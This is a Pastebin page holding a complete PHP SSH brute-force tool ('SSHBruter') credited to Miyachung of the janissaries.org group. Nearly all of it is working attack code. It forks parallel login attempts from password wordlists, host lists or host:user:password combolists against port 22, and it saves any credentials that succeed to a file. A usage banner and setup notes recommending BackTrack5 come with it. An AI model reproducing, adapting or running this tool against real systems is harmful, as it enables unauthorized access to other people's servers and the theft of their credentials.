Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SSH Cracker <?php
- /*
- .__ .__
- _____ |__|___.__._____ ____ | |__ __ __ ____ ____
- / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
- | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
- |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
- \/ \/ \/ \/ \/ \//_____/
- * SSH Brute-Forcer
- * Written by Miyachung
- * Homepage : http://janissaries.org
- * Youtube Channel: http://www.youtube.com/janissariesorg
- * Usage : http://www.youtube.com/watch?v=h5Fx3PBjUCg
- * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended)
- * @@ This tool is using process forking system
- * All rights reserved
- * Contact with coder: miyachung@hotmail.com or jabber.org
- */
- error_reporting(0);
- /*
- * Call the class
- */
- $SSH = new SSHBruter();
- /*
- * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed
- * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool
- */
- if(!function_exists("ssh2_connect"))
- {
- $SSH->showErrorMsg(1);
- }
- elseif(!function_exists("pcntl_fork"))
- {
- $SSH->showErrorMsg(2);
- }
- /*
- * Parse arguments
- * There is 3 way to brute
- * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
- * Combolist : -c <combolist> -o <output> -t <thread>
- * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
- */
- $options_single = getopt("h:u:w:o:t:");
- $options_combo = getopt("c:o:t:");
- $options_multi = getopt("f:u:w:o:t:");
- /*
- * Does arguments control!
- */
- if($options_single)
- {
- if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null)
- {
- $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] );
- }
- else{
- $SSH->showErrorMsg(3);
- }
- }
- elseif($options_combo)
- {
- if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null)
- {
- $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] );
- }
- else{
- $SSH->showErrorMsg(3);
- }
- }
- elseif($options_multi)
- {
- if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null)
- {
- $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] );
- }
- else{
- $SSH->showErrorMsg(3);
- }
- }
- else
- {
- $SSH->showErrorMsg(3);
- }
- class SSHBruter
- {
- /*
- * Prints 'MAIN_MESSAGE' if arguments used wrong
- */
- const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n*********************************************\n";
- /*
- * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found
- */
- const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n";
- /*
- * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found
- */
- const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n";
- /*
- * Prints 'ARGMISS' if arguments not specified
- */
- const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n";
- /*
- * Counts hosts & passwords , increments in foreach loop
- */
- private $counter = 0;
- /*
- * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
- */
- function SingleBrute( $host , $user, $wordlist, $output , $thread )
- {
- echo "\n";
- echo "Host: ".$host."\n";
- echo "User: ".$user."\n\n";
- $chunk_wordlist = array_chunk( file($wordlist) , $thread );
- foreach($chunk_wordlist as $passwords)
- {
- foreach($passwords as $password)
- {
- $this->counter++;
- $fork = pcntl_fork();
- if(!$fork)
- {
- $perform_single = $this->SSH( $host , $user , trim($password) , $output );
- if($perform_single)
- {
- print "Sleeping 120 seconds , PRESS CTRL + C NOW!";
- sleep(120);
- }
- exit;
- }
- }
- $this->waitForThreadFinish();
- }
- }
- /*
- * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread>
- */
- function ComboBrute( $combolist , $output , $thread )
- {
- $chunk_combolist = array_chunk( file($combolist) , $thread);
- foreach($chunk_combolist as $combo)
- {
- foreach($combo as $hostuserpwd)
- {
- $this->counter++;
- list($host,$user,$password) = split(":",trim($hostuserpwd));
- $fork = pcntl_fork();
- if(!$fork)
- {
- $this->SSH( $host , $user , $password , $output );
- exit;
- }
- }
- $this->waitForThreadFinish();
- }
- }
- /*
- * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
- */
- function MultiBrute( $hostlist , $user , $wordlist , $output , $thread )
- {
- foreach(file($hostlist) as $host)
- {
- $chunk_wordlist = array_chunk( file($wordlist) , $thread );
- foreach($chunk_wordlist as $passwords)
- {
- foreach($passwords as $password)
- {
- $this->counter++;
- $fork = pcntl_fork();
- if(!$fork)
- {
- $this->SSH( trim($host) , $user , trim($password) , $output );
- exit;
- }
- }
- $this->waitForThreadFinish();
- }
- }
- }
- /*
- * Performs login to host with specified user and password(s)
- */
- function SSH( $host , $user , $password , $output , $port = 22 )
- {
- $connect = ssh2_connect( $host , $port );
- if(!$connect)
- {
- print "[".$this->counter."] Host: ".$host." Connection Failed\n";
- flush();
- break;
- }
- else
- {
- $auth = ssh2_auth_password( $connect , $user , $password );
- if($auth)
- {
- $a = "*********************************************\n";
- $a.= "[+] Found!\n";
- $a.= "[+] Host: ".$host."\n";
- $a.= "[+] User: ".$user."\n";
- $a.= "[+] Password: ".$password."\n";
- print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n*********************************************\n";
- self::SaveResult( $output , $a );
- return true;
- }
- else
- {
- print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n";
- flush();
- break;
- }
- }
- }
- /*
- * All error messages showing from there
- */
- function showErrorMsg( $errno )
- {
- print self::MAIN_MESSAGE;
- if($errno == 1)
- {
- print self::NOT_INSTALLED_SSH;
- exit;
- }
- if($errno == 2)
- {
- print self::NOT_INSTALLED_PCNTL;
- exit;
- }
- if($errno == 3)
- {
- print self::ARGMISS;
- exit;
- }
- }
- /*
- * Waits for threads to finish
- */
- function waitForThreadFinish()
- {
- while (pcntl_waitpid(0, $status) != -1) {
- $status = pcntl_wexitstatus($status);
- }
- }
- /*
- * Saves everything with this function
- */
- static function SaveResult( $output,$text )
- {
- $open_file = fopen( $output , "a" );
- fwrite( $open_file , $text );
- fclose( $open_file );
- }
- }
- # miyachung represents / janissaries.org group
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement